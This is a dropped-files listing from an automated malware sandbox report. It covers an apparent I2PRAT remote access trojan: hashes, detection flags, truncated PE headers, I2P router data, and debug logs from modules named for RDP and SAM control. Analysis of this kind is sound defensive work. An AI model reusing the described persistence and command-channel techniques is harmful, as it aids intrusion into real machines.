                                                                  Preview:O..Q.8.tS.\.......FJr3j.W.]e'4wcS.s.......L.....b.LMmjm..4n1?=..pE.F.......'T..v.-.......:......GJ.E....y4*...).:|.K?..]Q.l..]E=.QZ.u..~..~...m.K..t7k...!Sj...s..9.3&.].X..p.:(...>\';.T?-..ZxX........5...wg.f.$./........].ad6n]......E.t....i..\..$...._f......c).cD1>...t.D.tQeR...i%.Y?UM.\.ctL5d...<|*E.x..Vf.hX.".N(.k.<....U. Pw]...q...K$...gT.V.J.~9.0.._..cI....E..iy.......yt....c.53 . z.._....X....X........W.sy>8.......k..B......4.H.. ;....Z_...XTf..;z...s..-.m?s3N..r..qD..S.=..5...Wc....
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):7.583816616503171
                                                                  Encrypted:false
                                                                  SSDEEP:12:AC+drKG9hzN6APtdjvm9Qjx7xmvem+9yZAGAiSRmb7IB:3IrK2h40thm9cxVmWm+M5dSRmQB
                                                                  MD5:9B60E2F601C964F30BE8BD65DF1920AE
                                                                  SHA1:F4ED503A4212E1FC9E74A6E535CC35CEB244C617
                                                                  SHA-256:0B8A169AC042ECAB63436EDF3395DC19C77D973FCD534B410DF0F0D87CE457E4
                                                                  SHA-512:D3AFA732967A8C5019E5019F73C8653C075B358D108459470CEBA42B49F9BA2B277BA6B7528A04CD98B389ADD7C40AE79355326AB3B9B23DE5C90B1E5355A260
                                                                  Malicious:false
                                                                  Preview:.....Loe...u..6p..............O...G.....}...H....Z;..i...R..orZ[.t$N:f../`....>o......|.....[..d.......cn.00@<.._}.K.......W......{";....^..-......O1.(.G..].._l[......V.....n.K.*.Uy...8.h....Sl..(G..}....A98...Rt..-@v...,.>.../...}.....w.....l.4..c...i...~5...>y...Xm.4Yi...4.2.V.T..O.I.......h..lb......Z@.7.U....7xm..j.VL..~..j.9..=i.X..D}.Y%.(?.#.eM...y.W.%....E.c.>.....=..P.g4._.i...........2.r."...!..Y."...e=m.Z.U...n......5~.}.S.h.V.....~0...1e,.@.h.R..?...+....q....a....O......>
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):6.096928094887358
                                                                  Encrypted:false
                                                                  SSDEEP:3:s8gakRGVSOZudzJP7W8P7hM+6NNvUuLj8wJ:OakRkpIlP71FuvUuLj8wJ
                                                                  MD5:DAAC02B132D3EC46BFB296E5D39BBE19
                                                                  SHA1:FB35CCD7395F373E7828FA446E08BF1257AA8E6A
                                                                  SHA-256:36A0A41A2DDE65E207882F7F81386ED9ECCAB756FE530FC8362ADE5D9B3D62B4
                                                                  SHA-512:A9509B983CDF1565F754E3B6DC088EE268B572A5C17C2C6AEE0DB56CCECB5D65E1911480443BA74B64E30EF4B4657B0FBD0179C7C25637A84128B4BE18862C8B
                                                                  Malicious:false
                                                                  Preview:..r.3....................1L...58.....'........&........O.K.]F.L.:5....U.'..%.
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):721
                                                                  Entropy (8bit):6.657155753224201
                                                                  Encrypted:false
                                                                  SSDEEP:12:RrSpomISpomISpomISpomISpomISpomISpomISpomISpomISpfSe03J7n98JhIwn:g7L7L7L7L7L7L7L7L7LKDJSG4rigVoK
                                                                  MD5:F621E7D35B80873765C7F178FC6A681C
                                                                  SHA1:B431BE308026FC97DC4F9F4B12B2849DC5FF4A05
                                                                  SHA-256:72B004878BC09CE325A148340E75ABF37A8357714EABAB3AD481B98EF35ED182
                                                                  SHA-512:3A7835FFBD6840ADCCE0E7B669FD1937D9A2FAA403225F7A9EF006BA5F0C8CEBFFE5C888DE727AA3307BF07BCD370B46A1AA615B36613003398FCC948A124A36
                                                                  Malicious:false
                                                                  Preview:..:..U<..7..m....(@...h.R..@.!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t.a..?N.[.....+.....q>...4..h.a[...........W..............NTCP2.@.caps=.4;.s=,-AVywzMEFpnwv~fS9X~BC76tg4Sk5Mb3238xTJLA5jU=;.v=.2;..........SSU2.q.caps=.4;.i=,~QHa9hi0TljRyJUAjCqA6LN84Mx-Ao9fJqs2p1M3SGI=;.s=,eUI9J8LqidvcKjwgIM0dDdjrgpK1U3HtLqvVwEkdGjw=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;T.AB.L.v..e....>...".U.....7. ....[V..D.tJ."hO..{,..d..A......
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):455
                                                                  Entropy (8bit):6.040793856996376
                                                                  Encrypted:false
                                                                  SSDEEP:12:RrSpomISpomISpomISpomISpomISpomISpomISpomISpomISpfSJ2s:g7L7L7L7L7L7L7L7L7LKYs
                                                                  MD5:6E371672F769CDC4E6C6B646C49479EA
                                                                  SHA1:9ACADBFFD73C123083BADAF90B74B3EB21ECAA4E
                                                                  SHA-256:A51BD1EFA33708785F3FD05B0307B9F00AF6ACAC123D2EBBB956E25FFE218DAB
                                                                  SHA-512:8F34B38DDCDF60126E573876AA6ED9DFC7B7FB0CF8486F06257BBA7ADDFB23C4BBF135FDC274D0D543B1C87A5C9E71CD18CE0B3C6D371AC9FD702C6BB90D5D38
                                                                  Malicious:false
                                                                  Preview:..:..U<..7..m....(@...h.R..@.!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t..!.)..L...^.........M/.S...t.a..?N.[.....+.....q>...4..h.a[.............'.e<.Jw../.L...k..,%.o.'.......Q.....s.....e..r...
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96
                                                                  Entropy (8bit):6.181265755906957
                                                                  Encrypted:false
                                                                  SSDEEP:3:ASO3QimEcXh4Olf608+Y4r9dPlEtbBD51:ASKQfuOli084rWtBr
                                                                  MD5:8CFE522CFBAADD1BDAE52A55334156F2
                                                                  SHA1:C9E962BE36800222D8B77793D0002F883C175E17
                                                                  SHA-256:B02FD44CF65EBC03946941295A5D7D5550278D561B57935BED3C6DCECA47A4BF
                                                                  SHA-512:F17830519FFB31B500A9656D1F940191D7AE6B8CBE2E8E4B6CA4C060DB40D8B0B8E77486CFE68F14BDCD5219474F531A4E878FF8923E5B8224042D095FD1739F
                                                                  Malicious:false
                                                                  Preview:yB='....*< ......Sq.....I..<..&H'<.a...q.2.]-.....LJ.....[......NX....*..|..~.._&.6.S7Hb
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9146880
                                                                  Entropy (8bit):6.674868432808522
                                                                  Encrypted:false
                                                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):89088
                                                                  Entropy (8bit):6.205377670389132
                                                                  Encrypted:false
                                                                  SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                                                                  MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                  SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                                                                  SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                                                                  SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4672
                                                                  Entropy (8bit):5.35032008495527
                                                                  Encrypted:false
                                                                  SSDEEP:96:idHwWYJ9VXyHzHH0H20HaSHpmHu5SHSPmHSm5SHWmHOn5SH5SHYEmHX5SHvmHH5I:AziTCTn0W06SgO5S7z5SJc5SZSo35SOG
                                                                  MD5:CED2EC929C422734A983E047CED7F4CF
                                                                  SHA1:7B433E6EB57FFEBA5CF2A8EB576B7D7BC976D597
                                                                  SHA-256:38EA1EEC189B588743210552E8C7B85CD5A50984D146A3FB64B2C3F735092968
                                                                  SHA-512:72FED0733DA6E9C63CC832EBDA8C4A2D7FFA7A9DE684B5DB7A18B71EB64D7AD4DAF0A7010079437E07FAE758F21410548E1D5E32A1FD56FF02C39393F529F171
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, Author: Joe Security
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                                                  Process:C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):456
                                                                  Entropy (8bit):3.2341395630162877
                                                                  Encrypted:false
                                                                  SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                                  MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                                  SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                                  SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                                  SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                                  Malicious:false
                                                                  Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):105984
                                                                  Entropy (8bit):6.285421743969757
                                                                  Encrypted:false
                                                                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1167
                                                                  Entropy (8bit):5.4988598459278535
                                                                  Encrypted:false
                                                                  SSDEEP:24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJDJF0ERNuSXYjHeAOp:CFdHr54yclDYcm9FL/fT6eD
                                                                  MD5:2D505AA09A8141D8EFF7E75F623B4A5C
                                                                  SHA1:39FB13C9B7F951970F9D6E417125FBFC961B2327
                                                                  SHA-256:23A3CF66E882B60662A2582BCD5416088C70553AB9F2594658D8907E52293583
                                                                  SHA-512:8EBACB5886940C5BD150FACAD5FFB4D1916B03F82A37B42B330E1F3C2951BE11B92F66D3EE6BFC5EFD7FB0464865FAEB637B60A1502EE5CD9DF739704873B945
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1171a8a0)..[I] (tcp_connect) -> Done(sock=0x38c,host=7
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):129536
                                                                  Entropy (8bit):6.2852879161990645
                                                                  Encrypted:false
                                                                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                  MD5:88E6178B0CD434C8D14710355E78E691
                                                                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1354
                                                                  Entropy (8bit):5.494442993041193
                                                                  Encrypted:false
                                                                  SSDEEP:24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJDJF0dk1RDolXYLYcRAENmMeAOp:CFdH754yclDYcm9FL/fAvcLMMeD
                                                                  MD5:3F81E8EB023B4D8C031B871BB7A3ACDD
                                                                  SHA1:D9DB32522C317DE2D1BDA79741713693D1E12BC7
                                                                  SHA-256:781F8413084B05DC9E675C7C3C846E6FAD6D734F5D0EEB283FF400D03517FB4E
                                                                  SHA-512:1415EAEE5E8F800B4FDFB7F3B70B2F3352B9A79CAE7A668C6E70BC0E1203D52C9A5D0766A165FE4F1F202ACF96D673FAD00C10DC3AC4CFB8BEC1385ED3F13959
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe116f
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):2.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:9:9
                                                                  MD5:006F29D8E822B9241020AEC2495EF819
                                                                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                  Malicious:false
                                                                  Preview:wgNj
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):37376
                                                                  Entropy (8bit):5.7181012847214445
                                                                  Encrypted:false
                                                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):115712
                                                                  Entropy (8bit):6.25860377459178
                                                                  Encrypted:false
                                                                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1926
                                                                  Entropy (8bit):5.474986778744701
                                                                  Encrypted:false
                                                                  SSDEEP:48:CFdHr+54yclDYcm9FL/frr5ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9VXUD
                                                                  MD5:3D0F569F9B4563DEC524E3E2445FBFCF
                                                                  SHA1:151EB865ABC3178D4FEF17926A1595FCEB8CBFDC
                                                                  SHA-256:57E18819A575660BAB9BB234A0B1D1113F196DFBE0572AFFFA6093CE6895A3C3
                                                                  SHA-512:438FC132CC9F62D665A04CB47A431315E1968824C8B56EE420C82C1C99ED12F7AA8DA11A05EB8B04ADB18191FE84947209217FC3914151015E775B0C16FA5BB8
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe116be342)..[I] (tcp_connect) -
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):91136
                                                                  Entropy (8bit):6.2041507656664825
                                                                  Encrypted:false
                                                                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:Generic INItialization configuration [SLPolicy]
                                                                  Category:dropped
                                                                  Size (bytes):456534
                                                                  Entropy (8bit):5.450314708570292
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
